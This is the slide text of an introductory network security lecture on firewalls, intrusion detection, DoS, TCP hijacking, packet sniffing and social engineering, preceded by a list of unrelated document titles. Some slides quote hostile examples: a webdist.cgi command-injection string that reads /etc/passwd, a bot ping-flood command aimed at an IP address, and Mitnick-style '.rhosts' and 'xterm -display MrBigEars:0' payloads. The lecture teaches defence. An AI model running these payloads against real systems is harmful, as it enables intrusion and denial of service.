BÀI TẬP BỔ TRỢ TIẾNG ANH 8 CẢ NĂM - GLOBAL SUCCESS - NĂM HỌC 2023-2024 (CÓ FI...
 
বাংলাদেশ অর্থনৈতিক সমীক্ষা (Economic Review) ২০২৪ UJS App.pdf
বাংলাদেশ অর্থনৈতিক সমীক্ষা (Economic Review) ২০২৪ UJS App.pdfবাংলাদেশ অর্থনৈতিক সমীক্ষা (Economic Review) ২০২৪ UJS App.pdf
বাংলাদেশ অর্থনৈতিক সমীক্ষা (Economic Review) ২০২৪ UJS App.pdf
 
Film vocab for eal 3 students: Australia the movie
Film vocab for eal 3 students: Australia the movieFilm vocab for eal 3 students: Australia the movie
Film vocab for eal 3 students: Australia the movie
 
ANATOMY AND BIOMECHANICS OF HIP JOINT.pdf
ANATOMY AND BIOMECHANICS OF HIP JOINT.pdfANATOMY AND BIOMECHANICS OF HIP JOINT.pdf
ANATOMY AND BIOMECHANICS OF HIP JOINT.pdf
 
คำศัพท์ คำพื้นฐานการอ่าน ภาษาอังกฤษ ระดับชั้น ม.1
คำศัพท์ คำพื้นฐานการอ่าน ภาษาอังกฤษ ระดับชั้น ม.1คำศัพท์ คำพื้นฐานการอ่าน ภาษาอังกฤษ ระดับชั้น ม.1
คำศัพท์ คำพื้นฐานการอ่าน ภาษาอังกฤษ ระดับชั้น ม.1
 
writing about opinions about Australia the movie
writing about opinions about Australia the moviewriting about opinions about Australia the movie
writing about opinions about Australia the movie
 
Reimagining Your Library Space: How to Increase the Vibes in Your Library No ...
Reimagining Your Library Space: How to Increase the Vibes in Your Library No ...Reimagining Your Library Space: How to Increase the Vibes in Your Library No ...
Reimagining Your Library Space: How to Increase the Vibes in Your Library No ...
 
How to Create a More Engaging and Human Online Learning Experience
How to Create a More Engaging and Human Online Learning Experience How to Create a More Engaging and Human Online Learning Experience
How to Create a More Engaging and Human Online Learning Experience
 
BÀI TẬP BỔ TRỢ TIẾNG ANH LỚP 9 CẢ NĂM - GLOBAL SUCCESS - NĂM HỌC 2024-2025 - ...
BÀI TẬP BỔ TRỢ TIẾNG ANH LỚP 9 CẢ NĂM - GLOBAL SUCCESS - NĂM HỌC 2024-2025 - ...BÀI TẬP BỔ TRỢ TIẾNG ANH LỚP 9 CẢ NĂM - GLOBAL SUCCESS - NĂM HỌC 2024-2025 - ...
BÀI TẬP BỔ TRỢ TIẾNG ANH LỚP 9 CẢ NĂM - GLOBAL SUCCESS - NĂM HỌC 2024-2025 - ...
 
Digital Artefact 1 - Tiny Home Environmental Design
Digital Artefact 1 - Tiny Home Environmental DesignDigital Artefact 1 - Tiny Home Environmental Design
Digital Artefact 1 - Tiny Home Environmental Design
 
Traditional Musical Instruments of Arunachal Pradesh and Uttar Pradesh - RAYH...
Traditional Musical Instruments of Arunachal Pradesh and Uttar Pradesh - RAYH...Traditional Musical Instruments of Arunachal Pradesh and Uttar Pradesh - RAYH...
Traditional Musical Instruments of Arunachal Pradesh and Uttar Pradesh - RAYH...
 
Chapter wise All Notes of First year Basic Civil Engineering.pptx
Chapter wise All Notes of First year Basic Civil Engineering.pptxChapter wise All Notes of First year Basic Civil Engineering.pptx
Chapter wise All Notes of First year Basic Civil Engineering.pptx
 
What is Digital Literacy? A guest blog from Andy McLaughlin, University of Ab...
What is Digital Literacy? A guest blog from Andy McLaughlin, University of Ab...What is Digital Literacy? A guest blog from Andy McLaughlin, University of Ab...
What is Digital Literacy? A guest blog from Andy McLaughlin, University of Ab...
 
C1 Rubenstein AP HuG xxxxxxxxxxxxxx.pptx
C1 Rubenstein AP HuG xxxxxxxxxxxxxx.pptxC1 Rubenstein AP HuG xxxxxxxxxxxxxx.pptx
C1 Rubenstein AP HuG xxxxxxxxxxxxxx.pptx
 
ISO/IEC 27001, ISO/IEC 42001, and GDPR: Best Practices for Implementation and...
ISO/IEC 27001, ISO/IEC 42001, and GDPR: Best Practices for Implementation and...ISO/IEC 27001, ISO/IEC 42001, and GDPR: Best Practices for Implementation and...
ISO/IEC 27001, ISO/IEC 42001, and GDPR: Best Practices for Implementation and...
 
Walmart Business+ and Spark Good for Nonprofits.pdf
Walmart Business+ and Spark Good for Nonprofits.pdfWalmart Business+ and Spark Good for Nonprofits.pdf
Walmart Business+ and Spark Good for Nonprofits.pdf
 

Network security basics

  • 2. OVERVIEW • What is security? • Why do we need security? • Who is vulnerable? • Common security attacks and countermeasures • Firewalls & Intrusion Detection Systems • Denial of Service Attacks • TCP Attacks • Packet Sniffing • Social Problems 2
  • 3. WHAT IS “SECURITY” • Dictionary.com says: • 1. Freedom from risk or danger; safety. • 2. Freedom from doubt, anxiety, or fear; confidence. • 3. Something that gives or assures safety, as: • 1. A group or department of private guards: Call building security if a visitor acts suspicious. • 2. Measures adopted by a government to prevent espionage, sabotage, or attack. • 3. Measures adopted, as by a business or homeowner, to prevent a crime such as burglary or assault: Security was lax at the firm's smaller plant. …etc. 3
  • 4. WHY DO WE NEED SECURITY? • Protect vital information while still allowing access to those who need it • Trade secrets, medical records, etc. • Provide authentication and access control for resources • Ex: AFS • Guarantee availability of resources • Ex: 5 9’s (99.999% reliability) 7
  • 5. WHO IS VULNERABLE? • Financial institutions and banks • Internet service providers • Pharmaceutical companies • Government and defense agencies • Contractors to various government agencies • Multinational corporations • ANYONE ON THE NETWORK 8
  • 6. COMMON SECURITY ATTACKS AND THEIR COUNTERMEASURES • Finding a way into the network • Firewalls • Exploiting software bugs, buffer overflows • Intrusion Detection Systems • Denial of Service • Ingress filtering, IDS • TCP hijacking • IPSec • Packet sniffing • Encryption (SSH, SSL, HTTPS) • Social problems • Education 9
  • 7. FIREWALLS • Basic problem – many network applications and protocols have security problems that are fixed over time • Difficult for users to keep up with changes and keep host secure • Solution • Administrators limit access to end hosts by using a firewall • Firewall is kept up-to-date by administrators 10
  • 8. FIREWALLS • A firewall is like a castle with a drawbridge • Only one point of access into the network • This can be good or bad • Can be hardware or software • Ex. Some routers come with firewall functionality • ipfw, ipchains, pf on Unix systems, Windows XP and Mac OS X have built in firewalls 11
  • 10. FIREWALLS • Used to filter packets based on a combination of features • These are called packet filtering firewalls • There are other types too, but they will not be discussed • Ex. Drop packets with destination port of 23 (Telnet) • Can use any combination of IP/UDP/TCP header information • man ipfw on unix47 for much more detail • But why don’t we just turn Telnet off? 13
  • 11. FIREWALLS • Here is what a computer with a default Windows XP install looks like: • 135/tcp open loc-srv • 139/tcp open netbios-ssn • 445/tcp open microsoft-ds • 1025/tcp open NFS-or-IIS • 3389/tcp open ms-term-serv • 5000/tcp open UPnP • Might need some of these services, or might not be able to control all the machines on the network 14
  • 12. FIREWALLS • What does a firewall rule look like? • Depends on the firewall used • Example: ipfw • /sbin/ipfw add deny tcp from cracker.evil.org to wolf.tambov.su telnet • Other examples: WinXP & Mac OS X have built in and third party firewalls • Different graphical user interfaces • Varying amounts of complexity and power 15
  • 13. INTRUSION DETECTION • Used to monitor for “suspicious activity” on a network • Can protect against known software exploits, like buffer overflows • Open Source IDS: Snort, www.snort.org 16
  • 14. INTRUSION DETECTION • Uses “intrusion signatures” • Well known patterns of behavior • Ping sweeps, port scanning, web server indexing, OS fingerprinting, DoS attempts, etc. • Example • IRIX vulnerability in webdist.cgi • Can make a rule to drop packets containing the line • “/cgi-bin/webdist.cgi?distloc=?;cat%20/etc/passwd” • However, IDS is only useful if contingency plans are in place to curb attacks as they are occurring 17
  • 15. MINOR DETOUR… • Say we got the /etc/passwd file from the IRIX server • What can we do with it? 18
  • 16. DICTIONARY ATTACK • We can run a dictionary attack on the passwords • The passwords in /etc/passwd are encrypted with the crypt(3) function (one-way hash) • Can take a dictionary of words, crypt() them all, and compare with the hashed passwords • This is why your passwords should be meaningless random junk! • For example, “sdfo839f” is a good password • That is not my andrew password • Please don’t try it either 19
  • 17. DENIAL OF SERVICE • Purpose: Make a network service unusable, usually by overloading the server or network • Many different kinds of DoS attacks • SYN flooding • SMURF • Distributed attacks • Mini Case Study: Code-Red 20
  • 18. DENIAL OF SERVICE • SYN flooding attack • Send SYN packets with bogus source address • Why? • Server responds with SYN ACK and keeps state about TCP half- open connection • Eventually, server memory is exhausted with this state • Solution: use “SYN cookies” • In response to a SYN, create a special “cookie” for the connection, and forget everything else • Then, can recreate the forgotten information when the ACK comes in from a legitimate connection 21
  • 20. DENIAL OF SERVICE • SMURF • Source IP address of a broadcast ping is forged • Large number of machines respond back to victim, overloading it 23
  • 21. DENIAL OF SERVICE 24 Internet Perpetrator Victim ICMP echo (spoofed source address of victim) Sent to IP broadcast address ICMP echo reply
  • 22. DENIAL OF SERVICE • Distributed Denial of Service • Same techniques as regular DoS, but on a much larger scale • Example: Sub7Server Trojan and IRC bots • Infect a large number of machines with a “zombie” program • Zombie program logs into an IRC channel and awaits commands • Example: • Bot command: !p4 207.71.92.193 • Result: runs ping.exe 207.71.92.193 -l 65500 -n 10000 • Sends 10,000 64k packets to the host (655MB!) • Read more at: http://grc.com/dos/grcdos.htm 25
  • 23. DENIAL OF SERVICE • Mini Case Study – CodeRed • July 19, 2001: over 359,000 computers infected with Code-Red in less than 14 hours • Used a recently known buffer exploit in Microsoft IIS • Damages estimated in excess of $2.6 billion 26
  • 24. DENIAL OF SERVICE • Why is this under the Denial of Service category? • CodeRed launched a DDOS attack against www1.whitehouse.gov from the 20th to the 28th of every month! • Spent the rest of its time infecting other hosts 27
  • 25. DENIAL OF SERVICE • How can we protect ourselves? • Ingress filtering • If the source IP of a packet comes in on an interface which does not have a route to that packet, then drop it • RFC 2267 has more information about this • Stay on top of CERT advisories and the latest security patches • A fix for the IIS buffer overflow was released sixteen days before CodeRed had been deployed! 28
  • 26. TCP ATTACKS • Recall how IP works… • End hosts create IP packets and routers process them purely based on destination address alone • Problem: End hosts may lie about other fields which do not affect delivery • Source address – host may trick destination into believing that the packet is from a trusted source • Especially applications which use IP addresses as a simple authentication method • Solution – use better authentication methods 29
  • 27. TCP ATTACKS • TCP connections have associated state • Starting sequence numbers, port numbers • Problem – what if an attacker learns these values? • Port numbers are sometimes well known to begin with (ex. HTTP uses port 80) • Sequence numbers are sometimes chosen in very predictable ways 30
  • 28. TCP ATTACKS • If an attacker learns the associated TCP state for the connection, then the connection can be hijacked! • Attacker can insert malicious data into the TCP stream, and the recipient will believe it came from the original source • Ex. Instead of downloading and running new program, you download a virus and execute it 31
  • 29. TCP ATTACKS • Say hello to Alice, Bob and Mr. Big Ears 32
  • 30. TCP ATTACKS • Alice and Bob have an established TCP connection 33
  • 31. TCP ATTACKS • Mr. Big Ears lies on the path between Alice and Bob on the network • He can intercept all of their packets 34
  • 32. TCP ATTACKS • First, Mr. Big Ears must drop all of Alice’s packets since they must not be delivered to Bob (why?) 35 Packets The Void
  • 33. TCP ATTACKS • Then, Mr. Big Ears sends his malicious packet with the next ISN (sniffed from the network) 36 ISN, SRC=Alice
  • 34. TCP ATTACKS • What if Mr. Big Ears is unable to sniff the packets between Alice and Bob? • Can just DoS Alice instead of dropping her packets • Can just send guesses of what the ISN is until it is accepted • How do you know when the ISN is accepted? • Mitnick: payload is “add self to .rhosts” • Or, “xterm -display MrBigEars:0” 37
  • 35. TCP ATTACKS • Why are these types of TCP attacks so dangerous? 38 Web server Malicious user Trusting web client
  • 36. TCP ATTACKS • How do we prevent this? • IPSec • Provides source authentication, so Mr. Big Ears cannot pretend to be Alice • Encrypts data before transport, so Mr. Big Ears cannot talk to Bob without knowing what the session key is 39
  • 37. PACKET SNIFFING • Recall how Ethernet works … • When someone wants to send a packet to some else … • They put the bits on the wire with the destination MAC address … • And remember that other hosts are listening on the wire to detect for collisions … • It couldn’t get any easier to figure out what data is being transmitted over the network! 41
  • 38. PACKET SNIFFING • This works for wireless too! • In fact, it works for any broadcast-based medium 42
  • 39. PACKET SNIFFING • What kinds of data can we get? • Asked another way, what kind of information would be most useful to a malicious user? • Answer: Anything in plain text • Passwords are the most popular 43
  • 40. PACKET SNIFFING • How can we protect ourselves? • SSH, not Telnet • Many people at CMU still use Telnet and send their password in the clear (use PuTTY instead!) • Now that I have told you this, please do not exploit this information • Packet sniffing is, by the way, prohibited by Computing Services • HTTP over SSL • Especially when making purchases with credit cards! • SFTP, not FTP • Unless you really don’t care about the password or data • Can also use KerbFTP (download from MyAndrew) • IPSec • Provides network-layer confidentiality 44
  • 41. SOCIAL PROBLEMS • People can be just as dangerous as unprotected computer systems • People can be lied to, manipulated, bribed, threatened, harmed, tortured, etc. to give up valuable information • Most humans will breakdown once they are at the “harmed” stage, unless they have been specially trained • Think government here… 45
  • 42. SOCIAL PROBLEMS • Fun Example 1: • “Hi, I’m your AT&T rep, I’m stuck on a pole. I need you to punch a bunch of buttons for me” 46
  • 43. SOCIAL PROBLEMS • Fun Example 2: • Someone calls you in the middle of the night • “Have you been calling Egypt for the last six hours?” • “No” • “Well, we have a call that’s actually active right now, it’s on your calling card and it’s to Egypt and as a matter of fact, you’ve got about $2000 worth of charges on your card and … read off your AT&T card number and PIN and then I’ll get rid of the charge for you” 47
  • 44. SOCIAL PROBLEMS • Fun Example 3: • Who saw Office Space? • In the movie, the three disgruntled employees installed a money- stealing worm onto the companies systems • They did this from inside the company, where they had full access to the companies systems • What security techniques can we use to prevent this type of access? 48
  • 45. SOCIAL PROBLEMS • There aren’t always solutions to all of these problems • Humans will continue to be tricked into giving out information they shouldn’t • Educating them may help a little here, but, depending on how bad you want the information, there are a lot of bad things you can do to get it • So, the best that can be done is to implement a wide variety of solutions and more closely monitor who has access to what network resources and information • But, this solution is still not perfect 49
  • 46. CONCLUSIONS • The Internet works only because we implicitly trust one another • It is very easy to exploit this trust • The same holds true for software • It is important to stay on top of the latest CERT security advisories to know how to patch any security holes 50
  • 47. SECURITY RELATED URLS • http://www.robertgraham.com/pubs/network-intrusion- detection.html • http://online.securityfocus.com/infocus/1527 • http://www.snort.org/ • http://www.cert.org/ • http://www.nmap.org/ • http://grc.com/dos/grcdos.htm • http://lcamtuf.coredump.cx/newtcp/ 51